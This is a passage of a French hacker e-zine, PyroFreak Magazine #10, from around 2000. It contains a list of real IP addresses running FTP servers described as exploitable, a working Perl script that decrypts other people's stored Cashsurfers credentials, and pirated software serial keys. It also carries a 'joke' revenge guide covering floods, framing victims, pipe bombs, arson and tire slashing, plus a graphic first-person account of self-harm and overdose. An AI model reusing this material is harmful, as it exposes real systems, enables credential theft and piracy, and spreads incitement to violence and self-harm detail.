Compilation: cc -o exemple3 exemple3.c,donc le repertoire /test est créér, un message de réussite est renvoyé automatiquement par linux./test est également accessible par n'importe quel utilisateur. On peut le vérifier avec la commande ls -l,exemple3 a fait un chmod r+w+x+x+r+r+x /test. ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 21-sCAN pAR eNDRIX |( ) Phreak (X) Hack ( ) Autres '.__________Par Endrix________ ________ fbasoft@yahoo.com ______ ___ Unix FTP Server wu-2.4.2-acadam Beta 15, Beta 18 Outil n'cessaire, wuftpd exploit. amusez-vous :) 24.218.255.191:21: 220 daniel.hawke.org FTP server (Version wu-2.4.2-academ[BETA 24.200.0.153:21: 220 Panthere FTP server (Version wu-2.4.2-academ[BETA-15](1) Sa 24.200.11.90:21: 220 steph.excalior.net FTP server (Version wu-2.4.2-academ[BETA 24.200.14.55:21: 220 linux1.sillyweb.sil FTP server (Version wu-2.4.2-academ[BET 24.200.22.251:21: 220 pluton.imtel.com FTP server (Version wu-2.4.2-academ[BETA- 24.200.25.174:21: 220 dimsboiv.maison FTP server (Version wu-2.4.2-academ[BETA- 24.200.61.96:21: 220 localhost FTP server (Version wu-2.4.2-academ[BETA-18](1) M 24.200.61.192:21: 220 ysidea.dyndns.org FTP server (Version wu-2.4.2-academ[BETA 24.200.68.144:21: 220 modemcable144.68-200-24.mtl.mc.videotron.net FTP server (Version wu-2.4.2-academ[BETA-15] 24.200.69.139:21: 220 kostanza.dyn.ml.org FTP server (Version wu-2.4.2-academ[BE 24.200.71.167:21: 220 server FTP server (Version wu-2.4.2-VR17(1) 24.200.73.131:21: 220 tw.fdns.net FTP server (Version wu-2.5.0(1) Tue Sep 21 16: 24.200.74.56:21: 220 gilker FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon 24.200.76.168:21: 220 Serveur1.videotron.ca FTP server (Version wu-2.4.2-academ[ 24.200.78.151:21: 220 master FTP SERVER (Version wu-2.4.2-academ[BETA-18] 24.200.83.196:21: 220 demi.dhs.org FTP server (Version wu-2.6.0(1) Thu Oct 21 12 24.200.85.59:21: 220 moose.nodomain.nowhere FTP server (Version wu-2.4.2-VR17(1) 24.200.89.40:21: 220 DB-Srv.cognat.com FTP server (Version wu-2.4.2-academ[BETA- 24.200.94.5:21: 220 caribou.dyns.cx FTP server (Version wu-2.4.2-VR17(1) Mon Apr 24.200.99.160:21: 220 peter FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:2 24.200.100.113:21: 220 merlin FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09 24.200.101.174:21: 220 localhost FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 24.200.102.10:21: 220 tower.imperators.com FTP server (Version wu-2.4.2-academ[B 24.200.104.117:21: 220 stas.fulcrum.net FTP server (Version wu-2.4.2-VR17(1) Mon ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 22-Faire chier un trou du cul à la éleet |( ) Phreak ( ) Hack (X) Autres '.__________Par Tekrebel ________ tekrebel@vl.videotron.ca ______ ___ Hey les dudes, vous voulez vraiment faire chier quelqu'un parce qu'il vous a nické votre blonde, ou a rit de vous sur #outaouais ou #montreal? Ou encore ce nerd à la con à votre école qui se vante d'utiliser netbus et d'avoir hacker le fbi? Et bien lisez ce qui suit, c'est dans votre intérêt, vous serez une techno-terreur, un cyber thug, une super menace après avoir apris tout ce qui trouve dans cet article. Les combat à mains nues dans la vrai vie c'est pour les nuls, le cyberespace et le monde de l'électron ça c'est comme dirait un gars dans IGA, le cyber bronx. Assez de bavardage et passons tout de suite au briefing. Un petit avant goût de destruction, les floods Tout les cools de l'internet savent ce qu'est un flood, une inondation comme on dit en bon français. T'as qu'à te hacker une oc3 et tu pète la gueule au bandwidth de ton ennemi les deux doigts dans le nez en criant ciseaux. Et si le mec est du genre dur à cuir "j'ai un modem câble et je download du porn . 500k/s en me shaftant" et bien là tu lui balance un smurf, ça devrait suffire pour lui donner une frousse bleue et le convaincre de ne plus venir embêter ta cyber nana. Attention aux radiations, les nukes Ouaaisss... les nukes, l'arme absolue des vrai destructeurs. À manipuler avec soin si on ne veux pas se taper un leak de plutonium dans son ordi. Seuls les vrais pros du cyber fighting savent se servir de ces petits joujous . l'apparence innofensive. Cet emmerdeur d'irc cop va en manger toute une. OOB, Teardrop, un petit land combiné avec un double igmp et pif, ce petit aoleur vient de se retrouver triple KO. Encore une victoire pour coolhacker14, maitre incontesté des armes nucléaires et biochimiques de l'internet. Pour les opérations un peu plus délicates Bon, le mec s'est tapé un firewall, ou un coupe-feu bastion comme disent les mecs de z télé. T'affole pas, ce putain d'enfouaré n'est pas à l'abri. Parfois mieux vaut être sérieux et éviter des ennuis en y allant de la vrai manière éleet, le social engineering et les petits crosses électroniques. Ouais et bien le con il est sur Vidéotron ou tout autre isp à ip statique? Pas de problème, crache quelques port scan forgés avec son ip sur les serveurs de son isp et sur toi même. Ensuite, fait comme les trouillards et envoit un petit courriel . Bill "le couch fucker", admin de Vidéosuce. Et hop! En moins de deux, le mec se fait couper sa connection et devra s'expliquer avec ses parents qui auront reçu un petit appel d'plaisant de notre cher Bill. Cette section s'adresse aux super commandos masqués Attention, seuls les vrais killers, prêts . risquer le tout pour le tout doivent lire ce qui suit! Quand il s'agit de de venger contre un vrai con, vraiment dans le genre siphoneur de sphyncteur ou encore rectum rider, il faut procéder de la manière expéditive et efficace: couper la ligne manuellement. Haha, l'idiot ne se doûte surement pas qu'avec tes talents de uberhacker, tu t'es tapé son dossiers sur son ip. Bon, tu attend que tes parents aient fini d''couter le petit tracteur des arpents verts ou tout autre émission pour vieux débile, et tu te trimbale jusque chez le dude. Les vrais elites grimpent aux poteaux d'hydro et largue une pipe bomb dans la boite mais bon, si le mec vit dans ce quartier riche aux maisons de 200 000 et aux lignes souterraines et bien tu peux toujours faire chier bell et le gars en ouvrant ces petits boites brunes et en foutant le feu dedans. Et juste avant de partir, tu lui slash ses tires. Et bien, ceci conclu un autre merveilleux article du seul vrai hacker, le maitre du côté obscur et gardien de la citadèle de Delroth, j'ai nommé, moi-même, tekrebel. Alors amusez vous bien avec ces techniques et souvenez vous: les nukeurs seront un jour les maitres de l'internet et les faibles seront flanqués avec les trous du cul de AOL. P.S.: Au cas où vous étiez trop cons, cet article est une joke et la qualité du français est intentionellement laissée de côté. Nuke on! ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 23-Exploit altavista et Cash bar! |( ) Phreak (X) Hack ( ) Autres '.__________Par cyberrider________ ________ cyberride@hotmail.com ___ A.K.A DeREkTom Salut tous, dernièrement jai fait 2 progs pour vous aider à crosser altavista et Cash Bar ! Dans l'article qui va suivre, je vais vous expliquer le fonctionnement de c'est 2 programmes (Aller voir sur le site de PyroFreak dans les progz "Www.PyroFreak.Org" pour vous les procurés). -total3.exe -adshelp.exe Commençons par le total3.exe qui est total liberty 3.0 , il sert à cacher la bar de altavista quand l'on surf! Il est tout simple, mais j'ai mit un numéro de série , je sais pas pourquoi mais bon! Ouvrez le programme, il vous copie collera le numéro de série directement dans le clipboard, donc vous n'avez qu'à me le ctrl + v dans icq (1322337). Ensuite que je vous aurez envoyé le petit serial, vous n'avez qu'à le rentrer après le OK. Il va y avoir une petite bar de text qui va apparaître, tapper le serial et le programme va maintenant fonctionner! Comment s'en servir! C'est assez simple! Alors vous êtes offline! vous clicker sur connect le programme va vous connecter automatiquement et va fermer la bar! oui oui la fermer! Vous pourrez rester online tout le temps sans que la banner refresh le timer le click toute! Pour vous déconnecter, aller vous déconnecter normallement sur la systray sur le petit modem et ensuite sur le programme ou l'un avant l'autre, ca pas d'importance, mais il faut faire les 2! ;) C'est assez simple et pratique comme programme. Il fait tous à votre place!! enjoy this soft by CyberRider! Ensuite pour mon autre programme (adshelp.exe) faite autant à la press que cet article, il est simple d'usage poser votre curseur devant l'object ou la fenetre desiré, regarder le handle et retener le dans votre tete (pourquoi le prog le retien pas ? bin pour que vous vous pensiez hacker:)) Ensuite vous aller dans le menu et selectionner le mode que vous voulez kill hide capsulate hide! Normalement capsulate hide est capable de cacher n'importe koi!! Cela depend des programmes ou de l'endroit que vous clicker ;)) Wow déjà fini cet article à la butch, j'espère que vous aller apreciez mes 2 petits softs! Question normallement posées: Pourquoi quand je me connect sur altavista sa dit qu'il est deja laoder? C'est parce que tu t'est mal d‚connecter! click sur disconnect dans le prog avant! Pourquoi quand je fait capsulate hide sa marche pas? Tu clcik mal ou bien que le prog neccessite un bon cracker ;) D'autres questions: cyberride@hotmail.com icq : 1322337 sur irc : DerekTom Pour les serials, contactez moi sur irc "derektom" ou sur icq "1322337". Merci CyberRider A.K.A DerekTom ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 24-ISOm \\'aReZ & MP3 (Partie 3) |( ) Phreak ( ) Hack (X) Autres '._______Par Vip0|a ____________________ ______ vipola@pyrofreak.org ___ Voici une suite de mes précédants arcticles.. j'avais d'autres notions à vous enseigné donc je ne vous avais parlé dans les 2 parties précédantes. OverBurn: ¯¯¯¯¯¯¯¯¯ Overburn, signifie Graver plus loin'. Ce qui signifie que l'on pourrait, en pratique, gravé plus de 74 minute sur un Cd de 74 minutes. Non, pas beaucoup, mais lorsque vous avez du ISO de 74m30s ou de 75min, le procédé de l'overburnage peut vous éviter de devoire utiliser un cd de 80 minutes (plus coûteux que les cd Habituel de 74 min.) Est-ce que tout le monde peuvent Overburner? la réponse est malheureu- sement 'non'. Pour overburner, il vous faut réunire 3 éléments. 1) Un logiciel qui accepte l'Overburn.. Ne pensez pas overburner avec Adaptec Eazy CD creator, il refusera, pensant bien faire, en prétendant que le CD est trop petit pour contenir les informations que vous voulez y mettre, il a théoriquement raison. Si vous désirez overburner, vous devrez vous servire d'unl ogiciel un peut moin friendly. Dans mon cas, je me sert de CDr-Win 3.7f. 2) Vous devez vous servire de CDs dont la zone de gravure est théoriquement légèrement plus grande que 74 minute.. Les maxell fonctionne très bien selon moi, mais il y en a surement plusieur autres. 3) Il vous faut un graveur acceptant de gravé plsu loin de 74 min.. Ce n'est pas tout les graveurs qui accepte de gravé plus loin que 74 minutes. Comment savoir si votre graveur accepte l'overburning? Testez est le seul moyen. Trouvez vous un Iso dont la taille est 'LÉGÈREMENT' plus longue que 74 min. (Prenez par exemple, le 4e CD de Final Fantazy 8). Si vous réussissez à le gravé adéquatement et que le résultat est une réussite. Cela signifiera donc que votre Graveur Peut Overburner. CDr-Win version 3.8a: ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Oui, la version 3.8a de CDr-win est sortie, mais je n'ai pas entendu de très bon commentaire à son propos. si votre 3.7f fonctionne corectement, je vous sugère de continuer a vous en servire =) Serial Protect de CDr-win: ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Comme vous l'avez sans doute remarquer, CDr-win est protégé à l'aide d'un serial Number. Mais saviez vous que lorsque vous entrez un movais s/n, Cdr-win va l'accepté, mais fera délibérément manquer vos Cds? Alors si vous avez de sérieux problème de CDs, essayez donc de le réinstaller. Voici une liste de s/n valide pour diverse version de CDr-win: CDr-Win v3.4b Name: pyrofreak Company: pyrofreak KeyCode: 0c9bba46-7c2a120e-fbd0f925-fdb3b3fd Chek Code: f12809bb-70b1a848-87faeb2b-06634ad8 CDr-Win v3.5a Name: pyrofreak Company: pyrofreak KeyCode: 0C9BA8FA-7C2A120E-2336F92E-FDB3B3FD Chek Code: F1281B07-70B1BAF4-5F1CEB20-DE854AD3 CDr-Win v3.7a Name: pyrofreak Company: pyrofreak KeyCode: 0C9BED9D-7C2A120E-4D29F915-FDB3B3FD Chek Code: F1285E60-70B1FF93-3103EB1B-B09A4AE8 CDr-Win v3.7b Name: pyrofreak Company: pyrofreak KeyCode: 0C9BED9D-7C2A120E-4D29F914-FDB3B3FD Chek Code: F1285E60-70B1FF93-3103EB1A-B09A4AE9 CDr-Win v3.7c Name: pyrofreak Company: pyrofreak KeyCode: 0C9B15F4-600893EB-4D29F902-FDB3B3FD Chek Code: F128A609-6C93861F-2D216AE9-B09A4AFF CDr-Win v3.7E Name: pyrofreak Company: pyrofreak KeyCode: C9BED9D-7C2A120E-4D29F919-FDB3B3FD Chek Code: F1285E60-70B1FF93-3103EB17-B09A4AE4 CDr-Win vg3.7f Name: pyrofreak Company: pyrofreak KeyCode: C9BED9D-7C2A120E-4D29F91F-FDB3B3FD Chek Code: F1285E60-70B1FF93-3103EB11-B09A4AE2 CDr-Win v3.8a Name: pyrofreak Company: pyrofreak KeyCode: B88F057E-F97FB637-4D29F90B-FDB3B3FD Chek Code: 453CB683-41F0B349-B4564F3C-B09A4AF6 Bootable CDs: ¯¯¯¯¯¯¯¯¯¯¯¯¯ Un CD boutable, vous connaissez? Si vous avez déja essayé linux, vous devez savoire de quoi je parle, Un cd Bootable est l'équibalent d'une disquette de démarrage, mais sur un CD. Pour se servire d'un Cd bootable, vous devez allé dans le BIOS de votre Machine et modifier la valeur vis-à-vis 'Booting Order' qui est probablement 'A,C'. Modifiez le pour "Cd-rom,C". Cela fera que lorsque vous ouvrez votre ordinateur, il essera dabord de booté sur le CD dans votre CD-rom. si le Cd présent dans le Cd-rom n'est pas un Cd bootable, ou qu'aucun Cd n'est présent dans le lecteur CD, il bootera simplement sur votre disqueDure C. L'utilité de Booté sur un CD? Pour linux par exemple, le Cd d'installation est un Cd boutable servant à formaté et installé linux sur votre disque dure (Qui est probablement formaté en DOS). Une autre utilisation est celle de restorer votre Hd avec un backup en cas de malchance. Vous bootez sur le Cd et formatez votre disque, puis copier une image précédamment fait de votre disque Dure. Ce principe évite de devoir toujour tout réinstallé manuellement à chaque formattage. Si vous usez un peut de votre imagination, je suis certain que vous en trouverez une tonne d'autre utilités. Vous pouvez créé un Cd boutable à l'aide du logiciel Adaptec Eazy Cd creator 4.. Dans l'arboressance du Cd en bas.. cliquer la où c'Est écrit le nom de volume du cd que vous allé créé, cliquez dessus avec le bouton droit, Allez sur 'New, Bootable CD' Eazy CD Creator va vous demandé d'inséré une disquette de démarage dans Votre lecteur A, pour qu'il puisse allé y cherché les command.com et compagnie. Jitter Error de CDr-win: ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ L'autre jour, j'ai essayé de gravé un cd à l'aide de CDr-win 3.7f, à ma grande surprise, à chaque tantative de création de l'image du Cd sur mon Hd, le logiciel me donnais une erreur: "Jitter Error" J'ai essayé plusieur fois de changer les différants options, sans résultat. J'ai finalement réussit ma copie avec facilité à l'aide du CD copier de Adaptec Eazy Cd creator 4. Les CDs qui me causent se problème sont les suivant: RailRoad Tycoon, RainBow Six. Si vous savez comment les copier avec CDr-Win, Envoyez moi un Email. Mais d'après moi, il s'agit d'une protection sur le CD. Je vous tiendrai au courant si j'ai des nouvelle sur le sujet. Protectoin des CDs: ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Votre ami vous a prèté son super jeu pour le Week-end et vous désirez vous en faire une copie. Je vous suggère donc le site: http://www.gamecopyworld.com/ Vous y sélectionnez le jeu que vousdésirez copier et vous avez tout les information nécéssaire sur la copy de cd Jeu. Plutôt pratique comme site =) J'achève donc cette 3e Partie de 'ISO \\'aReZ & MP3' en vous souhaitant bonne chance avec tout ce que je vous ai parlé dans cette arcticle et si vous avez des question ou des commentaire à me posé à propos du gravage des CDs ou tout autres sujet que j'ai abordé dans cette suite d'arcticles, n'ésitez pas! E-mailez moi =) Vip0|a -=--> Vipola@pyrofreak.org ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 25-Decryptage des comptes de Cashsurfers |( ) Phreak (X) Hack ( ) Autres '.__________Par zorgon________ _______zorgon@sdf.lonestar.org ____ ___ Vous connaissez certainement le systeme de baniere publicitaire qui s'affiche sur votre bureau en echange de quoi, vous gagnez de l'argent tout en surfant. Pour ca, il faut creer un compte sur un serveur. Ce compte vous permet de verifier votre nombre de points, de modifier les renseignements de votre compte ... Il existe un serveur particulierement interessant qui est Cashsurfers (http://www.cashsurfers.com). Vous creez un compte chez eux et en retour il vous propose de downloader une banniere que vous installerez.Rien de plus banal. Mais c'est la que ca devient interessant. Allez dans le repertoire d'installation, vous trouverez un config.ini ou le username et le passwd sont cryptes, et le probleme c'est qu'il n'y a pas grande difficulte a les decryptes. Je vous ai donc ecrit un script qui va faire ca pour vous. Il n'est peut-etre pas optimise mais il fonctionne. Reste plus qu'a recuperez un fichier config.ini, mais pour ca je vous fais confiance :-) ------- cut ----------------------------- #!/usr/bin/perl -w #----------------------------------------------- # # Cashsurfers script http://www.cashsurfers.com # by zorgon # #------------------------------------------------ @cle_user = (14,24,5,12); @cle_pass = (3,5,3,10); @alpha = ('a'..'z'); $file = $ARGV[0]; &usage() if (!defined($file)); open(INI,"$file") || die "Can't open file $file: $!"; while(){ if(/^Username/){ ($etiq,$user) = split(/\=/); chomp($user); } if(/^Password/){ ($etiq,$pass) = split(/\=/); chomp($pass); } } close(INI); &decrypt_user($user); &decrypt_pass($pass); #------------------------------ # Decryptage du username #------------------------------ sub decrypt_user { my($username)=@_; $lguser=length($username); $nbcar=$lguser/3; $j=0; for($i=0;$i<$lguser;$i+=3){ $tmp[$j]=substr($username,$i,3); $crypt[$j] = $tmp[$j]-200; $j+=1; } $j=0; for($i=0;$i<$nbcar;$i+=1){ $j=0 if($j==4); if($crypt[$i]<$cle_user[$j]){ $crypt[$i] -= $cle_user[$j]-26; } else{ $crypt[$i] -= $cle_user[$j]; } $j += 1; } print "Username : "; foreach $val (@crypt){ print "$alpha[$val-1]"; } print "\n"; } #------------------------------ # Decryptage du password #------------------------------ sub decrypt_pass { my($password)=@_; $lguser=length($password); $nbcar=$lguser/3; $j=0; for($i=0;$i<$lguser;$i+=3){ $tmp[$j]=substr($password,$i,3); $crypt[$j] = $tmp[$j]-100; $j+=1; } foreach $val (@crypt){ $left = substr($val,0,1); $right = substr($val,1,1); $val=$left+$right; } $j=0; for($i=0;$i<$nbcar;$i+=1){ $j=0 if($j==4); if($crypt[$i]<$cle_pass[$j]){ $crypt[$i] -= $cle_pass[$j]-9; } else{ $crypt[$i] -= $cle_pass[$j]; } $j += 1; } print "Password : "; foreach $val (@crypt){ print "$val"; } print "\n"; } sub usage { print "Usage: excash.pl \n"; exit 1; } 0; -------- cut ------------------ Si l'algorithme de decryptage s'avere faux, envoyez-moi un mail a: zorgon@sdf.lonestar.org Ciao!! ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 26-Un peu de tout et de rien mais sourtout de moi... |( ) Phreak ( ) Hack (X) Autres '.__________Par Endrix________ ________ fbasoft@yahoo.com ______ ___ -+ Ceci marque mon retour à PyroFreak à côté de mon compatriote, Neuro. Comme vous avez surement entendu, je suis de retour avec PyroFreak pour aider et développement du groupe que moi ainsi que Neuro avons partis et mon but ne sera pas d'essayer de prendre le controle du groupe de plus connus du Québec mais bien d'améliorer la qualité de nos produits informatique et de nous diriger vers une sortie qui pourrait rendre PyroFreak unique dans sont genre sois pour le Hacking/Coding/Phreaking et autres.. Cet article ne sera pas sur l'informatique mais bien sur moi... Probablement que tout le monde s'en fou mais je suis sur que les bon lecteurs de ce zine vont bien lire ca et probablement(je l'espère bien) de donner quelques commentaires et suggestions pour pourront sois me faire plaisir pour plus me rediriger vers une direction meilleur pour faire place à l'amélioration. Comme résolutions de l'ans 2000 : - Faire de meilleurs programmes et plus complet - Développer une section Linux pour faire place à la programmation, à l'explication de distribution, window manager, de kernel.... - Me faire un serveur sur modem cable avec plusieurs distributions (slackware, redhat, openbsd, beos, debian...) pour crée certains bugs voullus et faire des concours de sécurité informatique - Installer une système de VMB pour laissé les intéressés à plus comprendre ce genre de chose - Et... d'être dison plus heureux dans la vie de tout les jours.... Vous savez que.. Les dernières années ont été plutôt difficile pour moi ainsi que pour d'autres. On a tous nos périodes dans la vie ou on a envit de tout laissé tomber, décrocher de la vie et tout abandonné. J'ai fallis le faire mais après y avoir bien pensé, j'ai trouvé ca stupide le fait qu'il y ai du monde qui s'enlève la vie à cause de la société d'aujourd'hui ou leur style de vie mais écoutez, on ne peut rien y faire, nous somme à l'année 2000 et demain on va être en 2000 aussi alors il ne faut pas ce blâmer sur le fait que le monde d'aujourd'hui est de la merde.. Il faut aider au développement montrer qu'on est plus fort que tout et que rien peut nous arrêtez... Nous sommes du monde intelligent alors serons-nous en umpeu pour une fois... Il vous ai déjà arrivé d'être intimidé par quelqu'un? Hey bien moi oui et dison que j'ai vraiment pas aimé ca.. Comparons la personne à la vie. Cette personne m'a fait crissement chier et qu'est-ce que je peux faire? 1- M'enfuire dans ma chambre, pleuré et ne rien faire 2- Prendre le controle et changer ca... Plus jamais je ne vais me faire avoir Hey bien, au début, j'ai choisis le #1 ... Peut'être par paresse mais écoutez, quand ca va mal, ca va mal! Il y a un bout que dans les partys, avec 12bières et un 13oz dans le corps avant j'avais du fun, LETS GO PARTYYYYYY!!!!!!!! Mais j'ai perdu gout à ca.. Et pendant ce temps, j'aimais mieu aller m'isoller dans une pièce et... Pleuré sur la merde que j'ai eu toute ces années, j'était tellement découragé que j'en pleurais.. j'avais plus de fun à vivre, je m'isolais, mes parents capotaient, mes amis(es) voullaient m'aider mais rien était à la hauteur parce que prendre une décision à coeur, il faut que ca vienne de l'intérieur et non de l'extérieur. Le psy lui ne fait que découvrir qu'est-ce que le problème est mais merde, il faut que la décision vienne de toi c'est comme pour arrêter de fumer.... Alors un jour jme suis dit... Merde jme suis laissé écoeuré par cet enfoiré de merde et j'ai fait rire de moi. Qu'est-ce que j'ai fait? Je suis allé le voir pendant que ces amis étaient avec lui et je lui ai dit ma facon de pensé il voullait me tuer mais.... Il n'a rien fait parce que j'en suis sur que dans un sens il s'est dit que j'avais eu beaucoup de courage pour faire ca et finnallement il n'a rien fait. c'est comme la vie, tu peux pas te laissé avoir par cette putain de société de merde il faut que ta présence serve à quelque chose, alors la je suis venu ici et j'ai écrit de texte. Je sais que c'est pas facile passer au travers d'une période que j'ai passé mais si je l'ai fait, tout le monde est capable. Je vais vous faire lire un extrès de F.U.C.K. (Fucked Up College Kids) qui parle de suicide et qui est vraiment mais vraiment bon. ================================================================================= ================================================================================= I am dead. I am breathing, but I feel no life. I sit and ask myself all the questions I can never truthfully answer. "Why can't I just be happy?" "Why do people treat me so fucked up?" "Why do I feel like dieing?"... Truth is, I don't feel like dieing. I feel like living...happily. In peace. But since I can't, I want to end it. I will end it. I must. I looked at the razor blade sitting on top of my stereo. I stared at it as if I was obsessively in love with it and what it is capable of. I started crying, I threw the phone that was in my hand. It hit the wall so hard, one off the pieces flew back and hit my eye. That pissed me the fuck off. I looked at the blade again, and decided to do it. Cut. I grabbed the blade, and wiped it off...I looked at my wrist and scratched my wrist as hard as possible. It turned red. Bright red. I started to cut, I slowly cut about an inch long....no where near the vein. Then I realized I didn't want to die. I wanted a scar, a physical scar, to show for my emotional ones. I decided to cut again, this time I was closer to my vein, I looked at the blood come out. I felt good. I felt like I was invincible. The phone rang. My ex, telling me how I felt again. Why do people automatically assume just because THEY are ok, that I must be too. He keeps telling me I am ok, that I don't want to die. That I won't. That he will stop me. It made me wanna do it more. I hung up...blade still in hand, and cut my other wrist again, right on my vein. I just watched the blood ooze out, it seemed so...so peaceful. I felt relieved. I licked my wrist, and tasted my blood. It was sweet. Sweetest thing I ever tasted. Kinda sick, huh? No. It was beautiful. That I felt so dead, yet so alive. I felt so much pain, yet so much warmth. I was listening to the SneakerPimps. Her voice hypnotized me. I felt like I wanted to be the beat, her voice caressing me. I decided that since I couldn't do that, I didn't want to do anything else. I went to my dresser, still bleeding, and reached for my trusty bottle of prozac. I took out 7 pills. All that was left. I took them all. I went to the bathroom, and took 4 or 5 codeine, I can't really remember, since I felt completely numb and dizzy. Next thing I remember doing is laying down on my cold floor. Completely intoxicated by the music. I woke up the next morning, feeling very very sick. I threw up about 5 times. I went back to my room, and looked at the floor. I saw blood all over, and a piece of paper right by it. I picked it up, and unfolded it. It said... "You did the right thing bitch, and if you wake up to see this, you failed once again. Next try! Sincerely, Your Mother!" WHAT THE FUCK!!! I am truly disturbed now. She has done it. She's lucky she's not here right now. (Keep in mind, this just happened) How could she say something so cruel to me? I know I get on her nerves, and sometimes she even feels like killing me,but damnnn!!! That's ok though. Because regardless of how bad it hurt to read that, I know she doesn't mean it. She is saying this because she knows I will live. She knows I have to. She's just bringing to my attention what a dumbass I make of myself when I do dumb shit like that. And it IS true. Point of this all; so many people inn my life have downed me for being "suicidal". They tell me I'm crazy, I'm exaggerating, blah blah blah. The thing is, most people who TALK about killing themselves, are the ones who are too fucking scared to actually go thru with it. They just want attention. They might feel like dieing, and in all actuality wish they were dead, but they won't do it. The ones who don't talk about, well they just don't. And sooner or later, that anger will eat them up, and they will go thru with it. But however, I have talked about it many times, telling people I was going to do it, and I really wanted to. I really tried. It just failed. And the more people tell me how I feel, or how things really are, makes me want to prove to them even more so, just how BAD it is. SO be careful.... ================================================================================= ================================================================================= Umpeu de moi? :) très bien J'ai commencé à jouer avec des ordinateurs quand mon père m'a acheté un commodore 64(le type qui se branchait sur la tv). Je me rappel, mimi la fourmis et tout les autres jeux, après ca j'ai eu un 386 et après un 486 et c'est à ce moment que je découvert d'autre choses que les jeux. J'était jeune et j'avais du fun avec mon msdos avec qbasic :) Tout ce qu'il me fallait après ca était mon os et mon quickbasic. J'ai même écrit un programme de gestion que mon école utilise encore à ce que j'ai entendu. oh, oh... J'ai entendu parler d'une linus trovalt.. Qui est-ce? Qu'est-ce qu'il fait? Linux, quel beau système d'exploitation, slackware et redhat que j'ai commencé. Après Je commence la programmation bash en pdksh pour unix. J'écris des petits scripts qui rendent mon travail moins long. Je fais du HTML et du design jusqu'à 5h le matin tout le temps. ôooo.. quel beau monde :) Mon ordinateur me respecte et je le respecte, il ne me faire pas chier apart quand j'ai ouvert mon ordi pour la première fois et j'ai échapper une fisse sur la motherboard de mon 386... heh mon papa était pas content :) Visualbasic... simple et puissant.. Je m'amuse maintenant à écrire des programmes en vb pour le net(port scanner, serveurs[http,ftp,telnet,echo...], les attaquents...) tout ce qui est possible à faire j'essais de le faire maintenant. euhh oui j'écoute la musique.. Et voici tout les groupes que j'aime : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ korn, incubus, green day, nofx, snuff, pennywise, milincolin, system of a down, bad religion, beastie boys, limp bizkit, techno, weezer, vulgaire machin, reset, rancid, rage against the machine, prodigy, our lady peace, off springs, lifter, lagwagon, i mother earth, groovy aardvark, grim skunk, eminem, deftones, cypress hill, collective saoul, blink 182... euh bon peut'être que j'en oublis mais c'est apeuprès ca. Sports : ¯¯¯¯¯¯¯¯ Ski alpin (ohhh yeahhhh free style skiing !!!! iron-cross 360 aek un grab.. mon meilleur truc:) Mountain Bike (mouaheh mont-tremblant extrème biking.. free style biking too :) Escalade intérieur&extérieur (ouais ya une nouvelle place à ottawa qui est super) euhh... sexe? (yeszer!) Badminton (mouais jme suis acheté une blacknight.. yeahhh i'm a pH33r now!) Divertissement : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ - Sécurité informatique (ouin so called computer hacking) - Phreaking (ouais vous auriez du voir quand on a réussit à pogner un tel payant) - Guitare (1 accoustique et 1 électrique fender strato aek un 200watts peavy) - Drum (un mix de westbury et de perl, stun 9 morceaux) - Électronique (heh ma soeur peu pu rentrer dans ma chambre sinon le système d'alarme part) - Potologue (ca se dit? jaime bien le tabac vert) - alcool (je ne suis qu'un simple dégustateur) - rave ( en passant mon 12 février a mtl ca va être fou! looove on the beat) - dison que j'ai entrer dans les batisses la nuit(école primaire l'on su en esti!) - coding :) - pi ben, jmendure :) Bon maintenant dans mon prochain zine je vais avoir plus de temps pour préparer mes choses et je vais faire plus d'article sur la sécurité. -endrix- ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 : |27-Les nouvelles en Vrac '.__________ ______ ______________ _______ ______________________ __ __ Nb de Neuro: Le 3/4 des questions, c'est endrix qui a répondu, et cette fameuse Maire Plourde ne la pas inscrit. Et quelques de nos réponses ont été quelque peu modifiés. Les leçons de Neuro Par Marie Plourde Le Journal de Montréal, Vendredi 18 Février 2000 Page 45 Sommes-nous en sécurité sur le net? Plus les grands sites sont la cible de hackers, plus la question se pose. Laissez-moi vous présenter Neuro, un membre de PyroFreak, groupe de pirates virtuels reconnu sur la scène francophone. Ouf! Neuro communique dans un language facile à comprendre pour le Net twit. On dit de lui qu'il excelle dans le phreaking, attaque de systemes téléphoniques. Il consacre 25 heures par semaine au hacking. Afin de nous aider à comprendre ce monde, il a accepté de subir l'intérrogatoire. La mitraille Neuro, c'est quoi un hacker? "Un hacker est une personne capable de comprendre les technologies de l'informatique. Ainsi, il prend le contrôle de serveurs auxquels il ne doit pas avoir accès afin d'y apporter des modifications. Souvent il implante un virus ou encore ce qu,on appelle un "backdoor", porte d'entrée secrète, qui lui donne un accès illimité à l'ordinateur sans avoir à hacker de nouveau. Normalement, un vrai hacker ne détruit jam,ais le contenu d'un ordinateur, il se contente d'utiliser les informations qu'il y trouve à des fins personnelles." Pyrofreak, est-ce une sorte de confrérie? "Un peu... Certains membres sont très proches, et ce, même s'ils habitent à 500 km. Quand arrive quelque chose à l'un d'entre nous, tout le monde le sait. Cependant, on n'échange pas nos secrets et nos connaissances avec n'importe qui. Nous sommes prudents." Quel est le but de Pyrofreak? "Aider la société à améliorer les technologies informatiques et téléphoniques." Wow! Des Mère Teresa du Net!!! Les hackers ne sont pas tous 